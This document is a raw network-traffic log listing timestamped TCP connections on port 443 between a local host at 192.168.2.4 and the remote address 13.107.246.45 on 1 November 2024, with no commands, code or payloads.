                                                                                        Nov 1, 2024 13:46:44.233810902 CET4434979113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.233820915 CET4434979113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.346878052 CET49792443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.346924067 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.347129107 CET49792443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.348021984 CET49793443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.348064899 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.348268986 CET49793443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.349704981 CET49794443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.349714994 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.349776030 CET49794443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.350158930 CET49794443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.350171089 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.350555897 CET49792443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.350564957 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.352524996 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.352536917 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.352613926 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.354373932 CET49793443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.354387999 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.354706049 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.354716063 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.355479002 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.355515003 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:44.355592012 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.355956078 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:44.355969906 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.081548929 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.083228111 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.083937883 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.084052086 CET49794443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.084075928 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.085110903 CET49794443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.085123062 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.086091995 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.086116076 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.086278915 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.087447882 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.087454081 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.088243008 CET49792443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.088263035 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.089582920 CET49792443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.089587927 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.090595961 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.090627909 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.090790033 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.091557026 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.091562033 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.092063904 CET49793443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.092070103 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.093350887 CET49793443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.093355894 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.215511084 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.215539932 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.215588093 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.215605021 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.215619087 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.215656996 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.216135025 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.216145992 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.216155052 CET49796443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.216160059 CET4434979613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.216707945 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.216727018 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.216773987 CET49792443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.216778040 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.216809988 CET49792443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.218677998 CET49792443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.218689919 CET4434979213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.223360062 CET49797443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.223390102 CET4434979713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.223448992 CET49797443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.225120068 CET49798443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.225137949 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.225199938 CET49798443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.225533009 CET49797443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.225558043 CET4434979713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.225878954 CET49798443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.225892067 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.249351978 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.249414921 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.249479055 CET49793443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.249723911 CET49793443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.249744892 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.249775887 CET49793443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.249782085 CET4434979313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.251059055 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.251190901 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.251240969 CET49794443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.251549959 CET49794443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.251564026 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.251574039 CET49794443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.251579046 CET4434979413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.254064083 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.254084110 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.254120111 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.254133940 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.254633904 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.254633904 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.254647970 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.254797935 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.254827976 CET4434979513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.254874945 CET49795443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.257576942 CET49799443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.257621050 CET4434979913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.257673979 CET49799443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.260709047 CET49800443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.260737896 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.260814905 CET49800443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.261110067 CET49800443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.261125088 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.262960911 CET49801443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.262995005 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.263073921 CET49801443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.263324976 CET49799443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.263351917 CET4434979913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.263902903 CET49801443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.263917923 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.954499960 CET4434979713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.955473900 CET49797443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.955475092 CET49797443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.955509901 CET4434979713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.955527067 CET4434979713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.968099117 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.968537092 CET49798443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.968561888 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.968820095 CET49798443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.968827009 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.978944063 CET4434979913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.981983900 CET49799443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.981983900 CET49799443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.982000113 CET4434979913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.982008934 CET4434979913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.993879080 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.994582891 CET49801443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.994582891 CET49801443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.994599104 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.994610071 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.996718884 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.997359991 CET49800443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.997359991 CET49800443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:45.997387886 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.997406006 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.083532095 CET4434979713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.083636999 CET4434979713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.083822966 CET49797443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.083822966 CET49797443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.084052086 CET49797443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.084069014 CET4434979713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.086630106 CET49803443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.086663961 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.086745024 CET49803443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.086971998 CET49803443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.086982012 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.096976995 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.097240925 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.097369909 CET49798443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.097455025 CET49798443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.097455025 CET49798443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.097470999 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.097475052 CET4434979813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.099513054 CET49804443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.099555969 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.099647045 CET49804443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.099767923 CET49804443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.099781990 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.107528925 CET4434979913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.107796907 CET4434979913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.107873917 CET49799443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.107873917 CET49799443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.107887983 CET49799443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.107892036 CET4434979913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.109944105 CET49805443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.109978914 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.110138893 CET49805443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.110349894 CET49805443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.110362053 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.124124050 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.124245882 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.124310017 CET49801443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.124340057 CET49801443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.124340057 CET49801443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.124349117 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.124355078 CET4434980113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.126178980 CET49806443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.126219034 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.126333952 CET49806443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.126440048 CET49806443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.126455069 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.128282070 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.128360987 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.128463030 CET49800443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.128561020 CET49800443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.128561020 CET49800443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.128576040 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.128587008 CET4434980013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.130434990 CET49807443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.130460978 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.130573034 CET49807443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.130712032 CET49807443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.130723953 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.812691927 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.813160896 CET49803443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.813178062 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.813694000 CET49803443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.813698053 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.853224993 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.857081890 CET49805443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.857100010 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.857809067 CET49805443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.857814074 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.865725040 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.866046906 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.866144896 CET49804443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.866185904 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.866460085 CET49807443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.866471052 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.866703987 CET49804443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.866710901 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.866934061 CET49807443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.866939068 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.869249105 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.869635105 CET49806443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.869645119 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.870039940 CET49806443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.870045900 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.941767931 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.942293882 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.942342997 CET49803443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.942363977 CET49803443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.942382097 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.942393064 CET49803443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.942398071 CET4434980313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.945080042 CET49808443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.945102930 CET4434980813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.945158005 CET49808443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.945334911 CET49808443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.945344925 CET4434980813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.984894991 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.984972000 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.985017061 CET49805443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.985233068 CET49805443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.985251904 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.985263109 CET49805443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.985269070 CET4434980513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.987796068 CET49809443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.987847090 CET4434980913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.987909079 CET49809443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.988069057 CET49809443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.988080978 CET4434980913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.994524956 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.994709969 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.994765997 CET49807443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.994801044 CET49807443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.994807005 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.994817972 CET49807443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.994822979 CET4434980713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.996797085 CET49810443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.996819973 CET4434981013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.996877909 CET49810443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.997068882 CET49810443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:46.997081041 CET4434981013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.001482964 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.001595974 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.001645088 CET49806443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.001689911 CET49806443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.001689911 CET49806443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.001713037 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.001729012 CET4434980613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.003598928 CET49811443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.003627062 CET4434981113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.003688097 CET49811443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.003856897 CET49811443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.003871918 CET4434981113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.004297018 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.004374981 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.004421949 CET49804443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.004508972 CET49804443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.004513979 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.004539013 CET49804443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.004544973 CET4434980413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.006464958 CET49812443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.006486893 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.006541014 CET49812443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.006663084 CET49812443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.006674051 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.697092056 CET4434980813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.697592974 CET49808443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.697614908 CET4434980813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.698128939 CET49808443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.698141098 CET4434980813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.714194059 CET4434980913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.714957952 CET49809443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.714958906 CET49809443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.715008020 CET4434980913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.715034008 CET4434980913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.729429007 CET4434981013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.730181932 CET49810443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.730181932 CET49810443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.730191946 CET4434981013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.730206013 CET4434981013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.734524965 CET4434981113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.735183954 CET49811443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.735183954 CET49811443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.735222101 CET4434981113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.735241890 CET4434981113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.748961926 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.749653101 CET49812443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.749653101 CET49812443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.749686956 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.749696970 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.826479912 CET4434980813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.828037024 CET4434980813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.828260899 CET49808443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.828260899 CET49808443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.828419924 CET49808443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.828434944 CET4434980813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.830964088 CET49813443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.831022978 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.831197023 CET49813443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.832412004 CET49813443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.832433939 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.843051910 CET4434980913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.843581915 CET4434980913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.843657017 CET49809443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.843657017 CET49809443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.843693972 CET49809443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.843710899 CET4434980913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.845679045 CET49814443192.168.2.413.107.246.45
